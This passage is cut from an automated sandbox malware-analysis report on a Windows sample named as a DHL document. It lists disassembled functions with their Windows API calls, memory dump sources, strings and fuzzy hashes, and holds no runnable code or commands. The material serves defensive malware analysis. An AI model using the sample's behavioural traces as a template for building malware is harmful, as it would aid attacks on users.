                                                                                            • gethostbyname.WSOCK32(?), ref: 008A0628
                                                                                            • IcmpCreateFile.IPHLPAPI ref: 008A0636
                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008A06C6
                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008A06E5
                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 008A07B9
                                                                                            • WSACleanup.WSOCK32 ref: 008A07BF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                            • String ID: Ping
                                                                                            • API String ID: 1028309954-2246546115
                                                                                            • Opcode ID: f2661834e85ef0ebebc2f2ec74b8650b6beed38119315c1ef96961eedaf42471
                                                                                            • Instruction ID: b466ee2ff8f22e0ad783c8daa6b737a6809e95fa466d66f608547093d466b8b8
                                                                                            • Opcode Fuzzy Hash: f2661834e85ef0ebebc2f2ec74b8650b6beed38119315c1ef96961eedaf42471
                                                                                            • Instruction Fuzzy Hash: 48917D355042019FE720CF19D489F1ABBE0FF45318F1485A9E46ADBAA2D731ED45CF92
                                                                                            Function 008A8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                            • API String ID: 707087890-567219261
                                                                                            • Opcode ID: d6e6235cbb8863f5a5a7d7dc22a1996af1be4e5ae1c37b6e505e66e6ea2c9717
                                                                                            • Instruction ID: 9ef97223dd5c08dbb30c9bb230973be17462f5b3857d0c15dd9713158119ac1b
                                                                                            • Opcode Fuzzy Hash: d6e6235cbb8863f5a5a7d7dc22a1996af1be4e5ae1c37b6e505e66e6ea2c9717
                                                                                            • Instruction Fuzzy Hash: 2551B131A0051ADBDF14DF6CC8409BEB7A5FF66324B214229E826E7680EF30DD50C7A0
                                                                                            Function 008A372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CoInitialize.OLE32 ref: 008A3774
                                                                                            • CoUninitialize.OLE32 ref: 008A377F
                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,008BFB78,?), ref: 008A37D9
                                                                                            • IIDFromString.OLE32(?,?), ref: 008A384C
                                                                                            • VariantInit.OLEAUT32(?), ref: 008A38E4
                                                                                            • VariantClear.OLEAUT32(?), ref: 008A3936
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                            • API String ID: 636576611-1287834457
                                                                                            • Opcode ID: 26d07d45eb5227c656dd18ca11124f16139332813518d7e3f8b24a8f7e300884
                                                                                            • Instruction ID: ddc37e799ada962ba1b9208b6505fc9352ebad27ab72a25903ce650dee52eae4
                                                                                            • Opcode Fuzzy Hash: 26d07d45eb5227c656dd18ca11124f16139332813518d7e3f8b24a8f7e300884
                                                                                            • Instruction Fuzzy Hash: 7B61AE70608311AFE310DF54D888B6ABBE8FF4A714F100929F995DB691D774EE48CB92
                                                                                            Function 00893388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008933CF
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008933F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString$_wcslen
                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                            • API String ID: 4099089115-3080491070
                                                                                            • Opcode ID: 8abc87ae283b15680d6df8837a89dbdf64cc50393e5e183a849a638a841ab027
                                                                                            • Instruction ID: ae1639c52858b400e0903d27dae5d99f9f89b8a43ec626c79798204a59e096c7
                                                                                            • Opcode Fuzzy Hash: 8abc87ae283b15680d6df8837a89dbdf64cc50393e5e183a849a638a841ab027
                                                                                            • Instruction Fuzzy Hash: 5B51AD71800219AACF15EBA4ED56EEEB778FF14340F144065F405F2292EB356F98CB62
                                                                                            Function 0088B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                            • API String ID: 1256254125-769500911
                                                                                            • Opcode ID: 36d07ba0fadfe55471a08e49feda505e749fba881d129e2754591ff438958747
                                                                                            • Instruction ID: e77ca66f3ea3337b470ba1afa2af0d3dbea893875b00d931ca1ab04e68dd2bfd
                                                                                            • Opcode Fuzzy Hash: 36d07ba0fadfe55471a08e49feda505e749fba881d129e2754591ff438958747
                                                                                            • Instruction Fuzzy Hash: BE419332A001279BCB20BE7D89905BE7BA5FFF17A4B254229E561D7284F731CD81C790
                                                                                            Function 00895393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 008953A0
                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00895416
                                                                                            • GetLastError.KERNEL32 ref: 00895420
                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 008954A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                            • API String ID: 4194297153-14809454
                                                                                            • Opcode ID: 900f716dddb7cf12674022df5d54a4e110052d471d1671d4983abce7a75d3d43
                                                                                            • Instruction ID: 1412118e9cd2e416e6a7782e503ccb386366362bb794d949c4406d87802d5827
                                                                                            • Opcode Fuzzy Hash: 900f716dddb7cf12674022df5d54a4e110052d471d1671d4983abce7a75d3d43
                                                                                            • Instruction Fuzzy Hash: FD31D4B5A006089FCB52EF69C884AAABBB4FF45305F188065F505DB292E731DD86CB91
                                                                                            Function 008B3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateMenu.USER32 ref: 008B3C79
                                                                                            • SetMenu.USER32(?,00000000), ref: 008B3C88
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008B3D10
                                                                                            • IsMenu.USER32(?), ref: 008B3D24
                                                                                            • CreatePopupMenu.USER32 ref: 008B3D2E
                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008B3D5B
                                                                                            • DrawMenuBar.USER32 ref: 008B3D63
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                            • String ID: 0$F
                                                                                            • API String ID: 161812096-3044882817
                                                                                            • Opcode ID: fa8b97bb578f6f5c0223b19f265bf3375f1230400307ea83f409c061426a297a
                                                                                            • Instruction ID: 2aa073d1b16793bbb9b886fd88ec29bd27db1af38637f2c73be483fef9108070
                                                                                            • Opcode Fuzzy Hash: fa8b97bb578f6f5c0223b19f265bf3375f1230400307ea83f409c061426a297a
                                                                                            • Instruction Fuzzy Hash: 97413A75A01209EFDB24CF64D854EEA7BB5FF49350F180129F946E7360D771AA10CB94
                                                                                            Function 008B3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008B3A9D
                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008B3AA0
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B3AC7
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008B3AEA
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008B3B62
                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 008B3BAC
                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 008B3BC7
                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 008B3BE2
                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 008B3BF6
                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 008B3C13
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 312131281-0
                                                                                            • Opcode ID: f88f7599315452405055fec4c13e17a186312eeaebcec06bcf34c4ff881029a7
                                                                                            • Instruction ID: 4436176f4ee81378005c51b72af9014a1bc8daaaab1df2d7cf740b062f856451
                                                                                            • Opcode Fuzzy Hash: f88f7599315452405055fec4c13e17a186312eeaebcec06bcf34c4ff881029a7
                                                                                            • Instruction Fuzzy Hash: 2E616875A00248AFDB11DFA8CC85EEE7BB8FB09714F100199FA15E73A1C770AA45DB60
                                                                                            Function 0088B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0088B151
                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B165
                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0088B16C
                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B17B
                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0088B18D
                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B1A6
                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B1B8
                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B1FD
                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B212
                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B21D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                            • String ID:
                                                                                            • API String ID: 2156557900-0
                                                                                            • Opcode ID: 2a9ee2ab1ef24417a2ab0242d503bf517ff2725f954bee43b35486a5f759e0b1
                                                                                            • Instruction ID: ee1334af5a4d2abdfc237458df466b0c7c10682ad40eb8c0f97d21347c173583
                                                                                            • Opcode Fuzzy Hash: 2a9ee2ab1ef24417a2ab0242d503bf517ff2725f954bee43b35486a5f759e0b1
                                                                                            • Instruction Fuzzy Hash: E43168B5540604BFDB10AF64DC88FBE7BA9FBA1311F10411AFA05DA1A0DBB4AE40CF64
                                                                                            Function 00852C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00852C94
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 00852CA0
                                                                                            • _free.LIBCMT ref: 00852CAB
                                                                                            • _free.LIBCMT ref: 00852CB6
                                                                                            • _free.LIBCMT ref: 00852CC1
                                                                                            • _free.LIBCMT ref: 00852CCC
                                                                                            • _free.LIBCMT ref: 00852CD7
                                                                                            • _free.LIBCMT ref: 00852CE2
                                                                                            • _free.LIBCMT ref: 00852CED
                                                                                            • _free.LIBCMT ref: 00852CFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 3f79551e3c01a5dd23cdf30e0b33eb3629f49d38d64ec70c9d60344b1565739e
                                                                                            • Instruction ID: d14d0e2a5c9d1c065a4d243c3c0a8256df27e2bcf3a1b7c730fc85edf72aa1ec
                                                                                            • Opcode Fuzzy Hash: 3f79551e3c01a5dd23cdf30e0b33eb3629f49d38d64ec70c9d60344b1565739e
                                                                                            • Instruction Fuzzy Hash: E8119676100108AFCB02EF58D882DDD3FA5FF06351F5144A5FE48AB322DA31EE549B92
                                                                                            Function 00821410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00821459
                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 008214F8
                                                                                            • UnregisterHotKey.USER32(?), ref: 008216DD
                                                                                            • DestroyWindow.USER32(?), ref: 008624B9
                                                                                            • FreeLibrary.KERNEL32(?), ref: 0086251E
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0086254B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                            • String ID: close all
                                                                                            • API String ID: 469580280-3243417748
                                                                                            • Opcode ID: 03942c3720e9afd95e5096c11e99a6cf50e240124977b324587bfe9251f2176e
                                                                                            • Instruction ID: 04779fb5bd27c85556a9623cc4f5246788d3f85f060180c9b869ad535e49d5c2
                                                                                            • Opcode Fuzzy Hash: 03942c3720e9afd95e5096c11e99a6cf50e240124977b324587bfe9251f2176e
                                                                                            • Instruction Fuzzy Hash: 47D18E31701222CFDB29EF18D499A29F7A0FF55710F2542ADE54AEB252DB30AC52CF91
                                                                                            Function 00897DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00897FAD
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00897FC1
                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00897FEB
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00898005
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00898017
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00898060
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008980B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                            • String ID: *.*
                                                                                            • API String ID: 769691225-438819550
                                                                                            • Opcode ID: 5addea4aa4f7a07939282ded2054bee0ecb86bebab29072a3228293993fc0565
                                                                                            • Instruction ID: a2da5bc438678d74c323d56b43e678a88befcb3d97a4ed49056c5b99e4ef419a
                                                                                            • Opcode Fuzzy Hash: 5addea4aa4f7a07939282ded2054bee0ecb86bebab29072a3228293993fc0565
                                                                                            • Instruction Fuzzy Hash: F081AF725182459BCF20FF18C8449AEB3E8FF89714F58486EF885D7250EB34DD498B92
                                                                                            Function 00825BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00825C7A
                                                                                              • Part of subcall function 00825D0A: GetClientRect.USER32(?,?), ref: 00825D30
                                                                                              • Part of subcall function 00825D0A: GetWindowRect.USER32(?,?), ref: 00825D71
                                                                                              • Part of subcall function 00825D0A: ScreenToClient.USER32(?,?), ref: 00825D99
                                                                                            • GetDC.USER32 ref: 008646F5
                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00864708
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00864716
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0086472B
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00864733
                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008647C4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                            • String ID: U
                                                                                            • API String ID: 4009187628-3372436214
                                                                                            • Opcode ID: 86a4ad31ab4b232605b9e40d9506c84b0c49d2ba48b087dc7cd7c83f44cf3bf9
                                                                                            • Instruction ID: 7a1ead3a28412cbd19007a1494b84362b50f58dbc7731fd958ea551b1c2c6a17
                                                                                            • Opcode Fuzzy Hash: 86a4ad31ab4b232605b9e40d9506c84b0c49d2ba48b087dc7cd7c83f44cf3bf9
                                                                                            • Instruction Fuzzy Hash: 9871FF30500209DFCF218F68C984ABE3BB6FF5A364F255269ED51DA2A6D7309881DF60
                                                                                            Function 0089359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008935E4
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • LoadStringW.USER32(008F2390,?,00000FFF,?), ref: 0089360A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
